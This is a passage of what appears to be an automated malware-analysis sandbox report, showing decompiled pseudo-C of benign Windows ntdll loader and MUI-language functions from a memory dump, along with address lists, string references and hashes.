							_t276 = L01134620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0115F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01161370(_t276, 0x10f4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0115BB40(0,  &_v68, _t170);
									if(L011243C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0115BB40(_t257,  &_v68, _t243);
								if(L011243C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01161370(_t278, 0x10f4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01134620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0115F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01161370(_v16, 0x10f4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0115BB40(_t262,  &_v68, _t244);
								if(L011243C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01161370(_t282, 0x10f4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0115BB40(_t262,  &_v68, _t201);
							if(L011243C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01134620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0115F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01161370(_t280, 0x10f4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0115BB40(_t267,  &_v68, _t245);
							if(L011243C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01161370(_t284, 0x10f4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0115BB40(_t267,  &_v68, _t224);
						if(L011243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                      0x01123d3c
                                                      0x01123d42
                                                      0x01123d44
                                                      0x01123d46
                                                      0x01123d49
                                                      0x01123d4c
                                                      0x01123d4f
                                                      0x01123d52
                                                      0x01123d55
                                                      0x01123d58
                                                      0x01123d5b
                                                      0x01123d5f
                                                      0x01123d61
                                                      0x01123d66
                                                      0x01178213
                                                      0x01178218
                                                      0x01124085
                                                      0x01124088
                                                      0x0112408e
                                                      0x01124094
                                                      0x0112409a
                                                      0x011240a0
                                                      0x011240a6
                                                      0x011240a9
                                                      0x011240af
                                                      0x011240b6
                                                      0x011240bd
                                                      0x011240bd
                                                      0x01123d83
                                                      0x0117821f
                                                      0x01178229
                                                      0x01178238
                                                      0x01178238
                                                      0x0117823d
                                                      0x0117823d
                                                      0x01123da0
                                                      0x01123daf
                                                      0x01123db5
                                                      0x01123dba
                                                      0x01123dba
                                                      0x01123dd4
                                                      0x01123e94
                                                      0x01123eab
                                                      0x01123f6d
                                                      0x01123f84
                                                      0x0112406b
                                                      0x0112406b
                                                      0x0112406e
                                                      0x0112406e
                                                      0x01124070
                                                      0x01124074
                                                      0x01178351
                                                      0x01178351
                                                      0x0112407a
                                                      0x0112407f
                                                      0x0117835d
                                                      0x01178370
                                                      0x01178377
                                                      0x01178379
                                                      0x0117837c
                                                      0x0117837c
                                                      0x0117835d
                                                      0x00000000
                                                      0x0112407f
                                                      0x01123f8a
                                                      0x01123f8d
                                                      0x01123f90
                                                      0x01123f95
                                                      0x0117830d
                                                      0x0117830f
                                                      0x01123f9b
                                                      0x01123fac
                                                      0x01123fae
                                                      0x01123fb1
                                                      0x01123fb1
                                                      0x01123fb6
                                                      0x01178317
                                                      0x0117831a
                                                      0x00000000
                                                      0x01123fbc
                                                      0x01123fc1
                                                      0x01123fc9
                                                      0x01123fd7
                                                      0x01123fda
                                                      0x01123fdd
                                                      0x01124021
                                                      0x01124021
                                                      0x01124029
                                                      0x01124030
                                                      0x01124044
                                                      0x01124046
                                                      0x01124046
                                                      0x01124044
                                                      0x01124049
                                                      0x01178327
                                                      0x01178334
                                                      0x01178339
                                                      0x0117833c
                                                      0x0112404f
                                                      0x0112404f
                                                      0x0112404f
                                                      0x01124051
                                                      0x01124056
                                                      0x01124063
                                                      0x01124063
                                                      0x01124068
                                                      0x00000000
                                                      0x01124068
                                                      0x01123fdf
                                                      0x01123fe2
                                                      0x01123fe4
                                                      0x01123fe7
                                                      0x01123fef
                                                      0x01124003
                                                      0x01124005
                                                      0x01124005
                                                      0x0112400c
                                                      0x01124013
                                                      0x01124016
                                                      0x01124017
                                                      0x0112401b
                                                      0x0112401e
                                                      0x00000000
                                                      0x0112401e
                                                      0x01123fb6
                                                      0x01123eb1
                                                      0x01123eb4
                                                      0x01123eb7
                                                      0x01123ebc
                                                      0x011782a9
                                                      0x011782ab
                                                      0x01123ec2
                                                      0x01123ed3
                                                      0x01123ed5
                                                      0x01123ed8
                                                      0x01123ed8
                                                      0x01123edd
                                                      0x011782b3
                                                      0x011782b6
                                                      0x00000000
                                                      0x01123ee3
                                                      0x01123ee8
                                                      0x01123eed
                                                      0x01123ef0
                                                      0x01123ef3
                                                      0x01123f02
                                                      0x01123f05
                                                      0x01123f08
                                                      0x011782c0
                                                      0x011782c3
                                                      0x011782c5
                                                      0x011782c8
                                                      0x011782d0
                                                      0x011782e4
                                                      0x011782e6
                                                      0x011782e6
                                                      0x011782ed
                                                      0x011782f4
                                                      0x011782f7
                                                      0x011782f8
                                                      0x011782fc
                                                      0x011782ff
                                                      0x011782ff
                                                      0x01123f0e
                                                      0x01123f11
                                                      0x01123f16
                                                      0x01123f1d
                                                      0x01123f31
                                                      0x01178307
                                                      0x01178307
                                                      0x01123f31
                                                      0x01123f39
                                                      0x01123f48
                                                      0x01123f4d
                                                      0x01123f50
                                                      0x01123f50
                                                      0x01123f53
                                                      0x01123f58
                                                      0x01123f65
                                                      0x01123f65
                                                      0x01123f6a
                                                      0x00000000
                                                      0x01123f6a
                                                      0x01123edd
                                                      0x01123dda
                                                      0x01123ddd
                                                      0x01123de0
                                                      0x01123de5
                                                      0x01178245
                                                      0x01123deb
                                                      0x01123df7
                                                      0x01123dfc
                                                      0x01123dfe
                                                      0x01123e01
                                                      0x01123e01
                                                      0x01123e06
                                                      0x0117824d
                                                      0x0117824f
                                                      0x01178254
                                                      0x00000000
                                                      0x01123e0c
                                                      0x01123e11
                                                      0x01123e16
                                                      0x01123e19
                                                      0x01123e29
                                                      0x01123e2c
                                                      0x01123e2f
                                                      0x0117825c
                                                      0x0117825f
                                                      0x01178261
                                                      0x01178264
                                                      0x0117826c
                                                      0x01178280
                                                      0x01178282
                                                      0x01178282
                                                      0x01178289
                                                      0x01178290
                                                      0x01178293
                                                      0x01178294
                                                      0x01178298
                                                      0x0117829b
                                                      0x0117829b
                                                      0x01123e35
                                                      0x01123e38
                                                      0x01123e3d
                                                      0x01123e44
                                                      0x01123e58
                                                      0x011782a3
                                                      0x011782a3
                                                      0x01123e58
                                                      0x01123e60
                                                      0x01123e6f
                                                      0x01123e74
                                                      0x01123e77
                                                      0x01123e77
                                                      0x01123e7a
                                                      0x01123e7f
                                                      0x01123e8c
                                                      0x01123e8c
                                                      0x01123e91
                                                      0x00000000
                                                      0x01123e91

                                                      Strings
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 01123E97
                                                      • WindowsExcludedProcs, xrefs: 01123D6F
                                                      • Kernel-MUI-Language-Allowed, xrefs: 01123DC0
                                                      • Kernel-MUI-Number-Allowed, xrefs: 01123D8C
                                                      • Kernel-MUI-Language-SKU, xrefs: 01123F70
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: f4ed251418b86766e0ef2be79c45478b9ab3df03f75ae221397965a2c5e93d6d
                                                      • Instruction ID: 41c5c7b86ceb6394eeccc40b3dd34203b05a4eef0751ce3f2d15a00fd1ce6f59
                                                      • Opcode Fuzzy Hash: f4ed251418b86766e0ef2be79c45478b9ab3df03f75ae221397965a2c5e93d6d
                                                      • Instruction Fuzzy Hash: 43F19072D04629EFCB19DF98C984EEEBBB9FF48650F15005AE905E7650E7349E01CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01148E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E01148E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x120d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1208464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1205780 & 0x00000003) != 0) {
							E01195510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1205780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0115B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1207984; // 0xcb2e58
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1208464; // 0x75150110
					 *0x120b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01149B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1205780 & 0x00000005) != 0) {
						_push(_t49);
						E01195510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                      0x01148e0f
                                                      0x01148e16
                                                      0x01148e19
                                                      0x01148e1b
                                                      0x01148e21
                                                      0x01148e7f
                                                      0x01148e85
                                                      0x01189354
                                                      0x0118936c
                                                      0x01189371
                                                      0x0118937b
                                                      0x01189381
                                                      0x01189381
                                                      0x0118937b
                                                      0x01148e9d
                                                      0x01148e9d
                                                      0x01148e29
                                                      0x01148e2c
                                                      0x01148e38
                                                      0x01148e3e
                                                      0x01148e43
                                                      0x01148eb5
                                                      0x01148eb9
                                                      0x011892aa
                                                      0x011892af
                                                      0x011892e8
                                                      0x011892e8
                                                      0x011892af
                                                      0x01148eb9
                                                      0x01148e45
                                                      0x01148e53
                                                      0x01148e5b
                                                      0x01148e5f
                                                      0x01148e78
                                                      0x01148e78
                                                      0x01148e7d
                                                      0x01148ec3
                                                      0x01148ecd
                                                      0x01148ed2
                                                      0x01148ed2
                                                      0x01148ec5
                                                      0x01148ec5
                                                      0x00000000
                                                      0x01148e7d
                                                      0x01148e67
                                                      0x01148ea4
                                                      0x0118931a
                                                      0x00000000
                                                      0x00000000
                                                      0x01189320
                                                      0x01148ea4
                                                      0x01148e70
                                                      0x01189325
                                                      0x01189340
                                                      0x01189345
                                                      0x01189345
                                                      0x01148e76
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Strings
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 0118933B, 01189367
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 01189357
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0118932A
                                                      • LdrpFindDllActivationContext, xrefs: 01189331, 0118935D
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: 736816d5772d56787bac82cf7100a333fd40905c4b10be1c64d31a1607f2d170
                                                      • Instruction ID: 8e0e748017633225140d65e0ab82665cc007001187a30eca64b6870f5269d7d8
                                                      • Opcode Fuzzy Hash: 736816d5772d56787bac82cf7100a333fd40905c4b10be1c64d31a1607f2d170
                                                      • Instruction Fuzzy Hash: 04412931A003359FEB3EBA9CD84DA36B6A5AB40E48F06816DDA0477552E7709C808782
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01128794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E01128794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0112934A() != 0) {
								_t159 = E0119A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1205780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01195510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1205780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0112849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01128999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01128999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1205c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1205c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01132280(_t92, 0x12086cc);
															_t94 = E011E9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1205c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01128A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1205c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1205c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0115F380(_t136, 0x10f1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01132280(_t108, 0x12086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E011E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0112FFB0(_t118, _t156, 0x12086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01159A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                      0x01128799
                                                      0x0112879d
                                                      0x011287a1
                                                      0x011287a3
                                                      0x011287a8
                                                      0x011287c3
                                                      0x011287c3
                                                      0x011287c8
                                                      0x011287d1
                                                      0x011287d4
                                                      0x011287d8
                                                      0x011287e5
                                                      0x011287ec
                                                      0x01179bfe
                                                      0x01179c00
                                                      0x01179c02
                                                      0x01179c08
                                                      0x01179c0d
                                                      0x01179c0f
                                                      0x01179c14
                                                      0x01179c2d
                                                      0x01179c32
                                                      0x01179c37
                                                      0x01179c3a
                                                      0x01179c3c
                                                      0x01179c42
                                                      0x01179c42
                                                      0x01179c3c
                                                      0x01179c02
                                                      0x011287da
                                                      0x011287df
                                                      0x011287e3
                                                      0x00000000
                                                      0x00000000
                                                      0x011287e3
                                                      0x011287f2
                                                      0x00000000
                                                      0x011287fb
                                                      0x011287fd
                                                      0x011287fe
                                                      0x0112880e
                                                      0x0112880f
                                                      0x01128810
                                                      0x01128814
                                                      0x0112881a
                                                      0x0112881c
                                                      0x0112881f
                                                      0x01128821
                                                      0x01128822
                                                      0x01128824
                                                      0x01128826
                                                      0x0112882c
                                                      0x0112882e
                                                      0x01179c48
                                                      0x01179c48
                                                      0x01128834
                                                      0x01128834
                                                      0x01128837
                                                      0x00000000
                                                      0x00000000
                                                      0x01128837
                                                      0x0112882e
                                                      0x0112883d
                                                      0x01128840
                                                      0x01128843
                                                      0x01128846
                                                      0x01128849
                                                      0x0112884c
                                                      0x0112884e
                                                      0x01128850
                                                      0x01128852
                                                      0x01128854
                                                      0x01128857
                                                      0x011288b4
                                                      0x011288b6
                                                      0x011288b6
                                                      0x01128859
                                                      0x01128859
                                                      0x01128859
                                                      0x01128861
                                                      0x01128866
                                                      0x0112886a
                                                      0x0112893d
                                                      0x01128941
                                                      0x00000000
                                                      0x01128947
                                                      0x01128947
                                                      0x0112894a
                                                      0x0112894c
                                                      0x00000000
                                                      0x01128952
                                                      0x01128955
                                                      0x0112895a
                                                      0x0112895d
                                                      0x0112895d
                                                      0x0112895f
                                                      0x01128961
                                                      0x01128961
                                                      0x01128968
                                                      0x00000000
                                                      0x00000000
                                                      0x0112896a
                                                      0x0112896b
                                                      0x0112896e
                                                      0x00000000
                                                      0x01128970
                                                      0x01128970
                                                      0x01128970
                                                      0x01128970
                                                      0x01128972
                                                      0x01128972
                                                      0x01128974
                                                      0x00000000
                                                      0x0112897a
                                                      0x0112897a
                                                      0x0112897d
                                                      0x00000000
                                                      0x01128983
                                                      0x01179c65
                                                      0x01179c6d
                                                      0x01179c72
                                                      0x01179c75
                                                      0x01179c75
                                                      0x01179c82
                                                      0x01179c86
                                                      0x01179c87
                                                      0x01179c88
                                                      0x01179c89
                                                      0x01179c8c
                                                      0x01179c90
                                                      0x01179c95
                                                      0x01179c97
                                                      0x01179ca0
                                                      0x01179ca3
                                                      0x01179ca9
                                                      0x01179ca9
                                                      0x00000000
                                                      0x01179ca9
                                                      0x01179ca3
                                                      0x00000000
                                                      0x01179c97
                                                      0x0112897d
                                                      0x00000000
                                                      0x01128974
                                                      0x01128988
                                                      0x01128992
                                                      0x01128996
                                                      0x00000000
                                                      0x01128996
                                                      0x0112894c
                                                      0x00000000
                                                      0x01128870
                                                      0x0112887b
                                                      0x0112887d
                                                      0x0112887f
                                                      0x01128881
                                                      0x01128884
                                                      0x01128884
                                                      0x01128886
                                                      0x01128889
                                                      0x0112888c
                                                      0x0112888e
                                                      0x01128891
                                                      0x01128891
                                                      0x01128898
                                                      0x00000000
                                                      0x00000000
                                                      0x0112889a
                                                      0x0112889b
                                                      0x0112889e
                                                      0x00000000
                                                      0x00000000
                                                      0x011288a0
                                                      0x011288a8
                                                      0x011288b0
                                                      0x011288b2
                                                      0x011288d3
                                                      0x011288d5
                                                      0x00000000
                                                      0x011288d7
                                                      0x011288db
                                                      0x011288dc
                                                      0x011288e0
                                                      0x011288e8
                                                      0x011288ee
                                                      0x011288f0
                                                      0x011288f3
                                                      0x011288fc
                                                      0x01128901
                                                      0x01128906
                                                      0x0112890c
                                                      0x0112890c
                                                      0x0112890f
                                                      0x01128916
                                                      0x01128917
                                                      0x01128918
                                                      0x01128919
                                                      0x0112891a
                                                      0x0112891f
                                                      0x01128921
                                                      0x01179c52
                                                      0x01179c55
                                                      0x01179c5b
                                                      0x01179cac
                                                      0x01179cc0
                                                      0x01179cc0
                                                      0x01179c55
                                                      0x01128927
                                                      0x01128927
                                                      0x0112892f
                                                      0x01128933
                                                      0x00000000
                                                      0x011288f5
                                                      0x011288f5
                                                      0x00000000
                                                      0x011288f7
                                                      0x011288f7
                                                      0x011288fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x011288fa
                                                      0x011288f5
                                                      0x011288f3
                                                      0x00000000
                                                      0x011288d5
                                                      0x00000000
                                                      0x011288b2
                                                      0x011288c9
                                                      0x00000000
                                                      0x011288c9
                                                      0x0112887f
                                                      0x0112886a
                                                      0x01128857
                                                      0x01128852
                                                      0x011288bf
                                                      0x011288bf
                                                      0x011287aa
                                                      0x011287ad
                                                      0x011287ae
                                                      0x011287b4
                                                      0x011287b5
                                                      0x011287b6
                                                      0x011287b8
                                                      0x011287bd
                                                      0x011287c1
                                                      0x011287f4
                                                      0x011287fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x011287c1
                                                      0x00000000

                                                      Strings
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 01179C28
                                                      • LdrpDoPostSnapWork, xrefs: 01179C1E
